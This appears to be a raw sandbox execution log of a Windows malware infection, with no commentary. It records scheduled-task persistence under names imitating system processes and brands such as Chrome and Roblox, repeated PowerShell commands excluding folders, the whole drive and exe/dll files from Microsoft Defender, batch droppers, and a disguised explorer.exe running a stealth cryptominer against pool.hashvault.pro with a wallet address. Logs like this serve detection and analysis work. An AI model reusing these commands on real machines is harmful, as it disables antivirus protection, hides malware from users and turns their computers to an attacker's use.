C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\winNet\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\winNet\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\en-US\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows NT\TableTextService\en-US\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Start Menu\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\All Users\Start Menu\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Start Menu\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 14 /tr "'C:\Program Files\7-Zip\Lang\Refcrt.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 13 /tr "'C:\Program Files\7-Zip\Lang\Refcrt.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\RuntimeBroker.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\msiexec.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Videos\WmiPrvSE.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Office16\services.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Templates\msiexec.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\smss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\TableTextService\en-US\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Start Menu\RuntimeBroker.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\Refcrt.exe'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\QgayOGv9z8.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\SYSTEM32\CMD.exe

"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Autodesk Maya" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo 5 /tn "Google Chrome Update" /tr "C:\Users\Admin\Music\xdwdAdobe Illustrator.exe" /RL HIGHEST

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe

"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Sidebar\TextInputHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Sidebar\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\DriversavessessionDlldhcp\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\DriversavessessionDlldhcp\cmd.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\TextInputHost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\cmd.exe'

C:\DriversavessessionDlldhcp\cmd.exe

"C:\DriversavessessionDlldhcp\cmd.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "

C:\winNet\ComContainerbrowserRefRuntime.exe

"C:\winNet/ComContainerbrowserRefRuntime.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7j6Rve8VVr.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "

C:\DriversavessessionDlldhcp\Roblox.exe

"C:\DriversavessessionDlldhcp/Roblox.exe"

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexec" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "msiexecm" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\AppData\Local\msiexec.exe'" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0xtg3qeg\0xtg3qeg.cmdline"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAE8.tmp" "c:\Users\All Users\Start Menu\CSCE598C95B4465A6B8FD381D8AE520.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wn1dimlu\wn1dimlu.cmdline"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBA3.tmp" "c:\Users\All Users\Templates\CSC8CA6EBD2C43546EAB5B52DFFDCC19C51.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a3pul1kr\a3pul1kr.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4F.tmp" "c:\Users\Admin\Videos\CSC72B8F320E3DF4B698070F74431A6B.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d4fuoeov\d4fuoeov.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCEC.tmp" "c:\Program Files\Microsoft Office\Office16\CSC13CEFDF3D78F44CBB74210E0B4722E24.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k1re5ehj\k1re5ehj.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDA7.tmp" "c:\Users\Public\CSC45678A7E34C649CB872DD19188FFFC30.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\eyrjm1oz\eyrjm1oz.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE53.tmp" "c:\Program Files\Windows NT\TableTextService\en-US\CSCCF1AAFE95DF4408AFAA786A37D33121.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\giwyemor\giwyemor.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF0E.tmp" "c:\Program Files\7-Zip\Lang\CSC6C23FC88DE514248B2B06EB9A779747D.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ekas2xo2\ekas2xo2.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFCA.tmp" "c:\Users\Admin\Music\CSCAE9C26FC32F449829EAD734848684A57.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tw0wsu25\tw0wsu25.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1085.tmp" "c:\Program Files\Windows Sidebar\CSC4DA05245C94C4B5D9D4CDA48E3EE2C5B.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0vpcczse\0vpcczse.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1131.tmp" "c:\DriversavessessionDlldhcp\CSCF9A40D7E7D05445BB6D15E59BA14ADE.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5m4qu4ob\5m4qu4ob.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES120C.tmp" "c:\Windows\System32\CSCEDEE80FABE974800B5DBB2ADA3AD378B.TMP"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 13 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 8 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msiexec.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\SasmzD9Mi7.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"

C:\Users\Admin\conhost.exe

"C:\Users\Admin\conhost.exe"

C:\Users\Admin\Bloxstrap.exe

C:\Users\Admin\Bloxstrap.exe

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\DriversavessessionDlldhcp\Roblox.exe

"C:\DriversavessessionDlldhcp\Roblox.exe"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\system32\schtasks.exe

SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit

C:\Windows\SYSTEM32\CMD.exe

